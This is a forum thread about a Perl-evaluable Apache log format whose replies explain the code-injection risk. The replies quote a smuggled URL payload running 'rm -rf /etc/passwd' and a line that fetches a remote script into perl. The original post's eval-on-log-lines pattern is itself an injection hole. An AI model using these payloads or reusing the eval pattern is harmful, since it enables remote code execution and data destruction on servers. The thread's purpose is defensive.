Pardon for the location of this post, but it really doesn't fit anyplace else. If you think it would be better someplace else, let me know.

Anyway, I manage a farm of servers for a government contractor (and no, we don't use cookies to track your life). Frequently I am asked to parse and compile large volumes of logs to extract various bizarre information. I have for many years just parsed the standard output from Apache. However, today, out of boredom, I decided to make that easy task simpler.

I wrote the following LogFormat for Apache that works quite well. It allows you to read in a line of the log and assign it directly to a hash. Like this:

while (<LOGFILE>) { my %hash=eval $_; ## do something with %hash }
The LogFormat is like this:
LogFormat "(bytes=>'%b',filename=>'%f',remotehost=>'%h',remoteip=>'%a' +,remoteuser=>'%l',serverport=>'%p',pid=>'%P',request=>'%r',status=>'% +s',time=>'%t',timeserve=>'%T',authuser=>'%u',url=>'%U',virtual=>'%v') +" log_perl
Not terribly exciting, or unique or difficult; but helpful.

Replies are listed 'Best First'.
Re: Perl readable Weblogs
by knobunc (Pilgrim) on Apr 18, 2001 at 23:18 UTC

    Cool idea. Very dangerous though. Your choice of delimiter is not safe (and I don't think there is a safe one). Apache passes anything you type on the URL through. So sending the URL:

    http://www.victim.com/trick'); system('rm -rf /etc/passwd'); ('

    Would become:

    (bytes=>'0',...,url=>'trick'); system('rm -rf /etc/passwd'); ('', ...)

    Which I don't want someone to be able to run on my server.

    From my brief reading of the BNF for valid URLs there are some invalid characters in URLs, such as ~, but Apache still writes out whatever it was given to the access log.

    Also I doubt it is faster to eval each line of the log rather than making the log format something that can be split. I bet a regular expression match is faster than the eval, and it is certainly safer.

    If you do decide to go with the split idea the following might work. Again you have to choose a good delimiter, but tacking the URL on the end means you can ignore it when choosing the delimiter by providing the number of fields to split. (Although I am not sure what request can contain so my choice of | as a delimiter may be invalid).

    LogFormat "%b|%f|%h|%a|%l|%p|%P|%r|%s|%t|%T|%u|%v|%U log_perl

    Then to read:

    while (<LOGFILE>) { my %hash; %hash{bytes, filename, remotehost, remoteip, remoteuser, serverport, pid, request, status, time, timeserve, authuser, virtual, url) = split /\|/, $_, 13; # Use hash

    -ben

      Although it is unlikely that the Apache user 'nobody' will be able to delete /etc/passwd (given as an example, of course), there are far more evil things that they can do, especially with e-commerce sites.

      Considering how much you can do with one line:    ...'); system('lynx --source http://www.hax.it/script.pl|perl'); (' You would be well advised to use a simple delimiter that doesn't require eval.
      Ouch! Never thought of the eval issues (though I suppose Safe would help). Unfortunately, having the know the field names before hand goes against the intent. HOWEVER, the following should work well: LogFormat "bytes|%b|filename|%f|remotehost|%h|remoteip|%a|remoteuser|%l|serverport|%p|pid|%P|request|%r|status|%s|time|%t|timeserve|%T|authuser|%u|url|%U|virtual|%v" log_perl then parsing it with a
      while (<LOGFILE>) { my %hash=split /\|/,$_; ## do something with %hash ala $hash{time} or $hash{bytes} }
      should eliminate the nasty stuff.

        Hum, you still get hit with the escaping problem since you don't know how many |s to split so you have to pick something that is not going to be in the URL. I would put the url at the end anway, so if they got some odd characters into the log Your new approach is certainly safer since you won't get bitten by evaled code.

        As an aside, someone else noted that you couldn't remove /etc/passwd as nobody, but remember this is a log analysis tool that will be run by some user periodically.

        -ben

Re: Perl readable Weblogs
by zigster (Hermit) on Apr 18, 2001 at 17:49 UTC
    Please edit your node to change the <pre> tags to <code> tags .. see Writeup Formatting Tips for more info. Your node has value but is hard to read so may be passed over. That would be a shame.
    --

    Zigster
      Sorry? I don't use a single <PRE> tag in the entire post; all <CODE>, baby! Perhaps you are speaking of the wrap with the LogFormat line? Well, it's on a single line like it has to be in the httpd.conf file.
        You are correct, I was a little hasty. My appologies.
        --

        Zigster